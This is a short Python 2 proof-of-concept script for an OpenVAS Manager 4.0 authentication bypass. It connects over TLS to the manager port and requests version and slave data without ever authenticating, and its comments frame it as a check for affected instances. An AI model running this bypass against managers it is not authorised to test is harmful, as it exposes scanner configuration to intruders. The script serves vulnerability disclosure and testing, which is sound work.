"""Proof of concept: OpenVAS Manager 4.0 authentication bypass check.

Opens a TLS session to the manager port on localhost and sends two
protocol commands, <get_version/> and <get_slaves/>, printing each raw
reply.  No <authenticate> element is sent at any point, so a manager
that enforces authentication is expected to refuse the second request.
If slave data comes back, the instance is affected and needs the vendor
fix; until then the manager port should stay reachable only from
trusted hosts.

Python 2 script: it writes str objects to the TLS socket and relies on
ssl.wrap_socket(), which was removed in Python 3.12.  The
single-argument print(...) form used here behaves the same as the
Python 2 print statement.
"""
import socket
import ssl

MANAGER_ADDR = ('localhost', 9390)
CA_BUNDLE = "/var/lib/openvas/CA/cacert.pem"

BANNER = (
    "#################################################################",
    "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #",
    "#################################################################",
    "\n",
)

# The peer certificate must chain to the local OpenVAS CA.  Note that
# wrap_socket() validates the chain only; it performs no hostname check.
raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tls_conn = ssl.wrap_socket(raw_sock,
                           ca_certs=CA_BUNDLE,
                           cert_reqs=ssl.CERT_REQUIRED)
tls_conn.connect(MANAGER_ADDR)

for banner_line in BANNER:
    print(banner_line)

# First request on the fresh session.  According to the script's own
# message this is the request that triggers the bug; no credentials
# have been presented before it.
print("--> Retrieving version...(exploiting the bug !)\n")
tls_conn.write("<get_version/>")
version_reply = tls_conn.read()
print(version_reply)
print("\n")

# Second request, still without any <authenticate> step.  For a
# defender, a command like this answered on a session that never
# authenticated is the observable sign of the flaw.
print("--> Retrieving slaves...\n")
tls_conn.write("<get_slaves/>")
slaves_reply = tls_conn.read()
print(slaves_reply)
print("\n")

tls_conn.close()